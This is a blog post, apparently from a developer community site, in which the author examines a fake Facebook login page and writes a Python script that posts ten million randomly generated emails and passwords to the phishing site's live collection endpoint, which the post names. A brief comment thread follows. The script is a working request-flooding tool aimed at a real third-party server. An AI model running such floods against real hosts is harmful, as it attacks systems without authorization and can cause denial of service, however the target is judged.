Have you ever received a text from a friend that was unfortunately hacked on Facebook?
Phishing is where an untrustworthy website pretends to be someone they are not, in order to collect visitors' login information.
I really dislike phishers, so I decided maybe I would get revenge. Five of my friends sent me a "video" just today.
I clicked on the "video", and it took me to a fake Facebook login page. I looked into the page, and saw this HTML:
<form method="post" action="https://mortalkomb07.xyz//save.php?api=1&lan=facebooknew&ht=1&counter0=combo1407" class="mobile-login-form _5spm" id="login_form" data-sigil="m_login_form" data-autoid="autoid_2" data-countryinsert="true">
...
<input name="pass" type="password">
<input name="username" type="text">
...
</form>
I decided I would replicate fake requests, and hopefully overwhelm them with false data, at least delaying them from attacking other, real, accounts.
I loaded some fake usernames, passwords, and country data (that was also included in the form.)
Setup
First, we import some libraries.
Then, we load some fake data.
import requests
import random
import string
import json
url = 'https://mortalkomb07.xyz//save.php?api=1&lan=facebooknew&ht=1&counter0=combo1407'
chrome_user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'
firstnames = json.load(open("firstnames.json"))
surnames = json.load(open("surnames.json"))
countries_and_states = json.load(open("countries_and_states.json"))['countries']
email_domains = ['yahoo.com', 'gmail.com', 'hotmail.com', 'verizon.net']
letters = string.ascii_lowercase
numbers = string.digits
password_chars = string.ascii_letters + string.digits
coinflip = lambda: bool(random.randint(0, 1))
The Loop
Now, we loop 10,000,000 times.
Each time, an email gets generated based on random names and surnames.
A country and state are chosen randomly.
A password is generated as a string of random characters.
Finally, a request is sent to their server.
for x in range(10000000):
email = ''
# first name
email += random.choice(firstnames).lower()
# add a surname
if coinflip():
email += "." if coinflip() else ""
email += random.choice(surnames).lower()
if coinflip():
email += str(random.randint(0, 100))
email += "@" + random.choice(email_domains)
password = ''
for y in range(random.randint(8, 20)):
password += random.choice(password_chars)
country_and_states = random.choice(countries_and_states)
while len(country_and_states['states']) == 0:
country_and_states = random.choice(countries_and_states)
country = country_and_states['country']
state = random.choice(country_and_states['states'])
# send the request
requests.post(url, {
"ua": "",
"email": email,
"pass": password,
"pais": country,
"Country": country,
"country": country,
"state": state
}, headers={
"User-Agent": chrome_user_agent
}, allow_redirects=False)
print("sent", x + 1, "fake emails and passwords")
Later, the output is:
This was a fun exercise, and hopefully the scammers get held back.
Top comments (2)
wow this was a very cool exercise
Thank you Joshua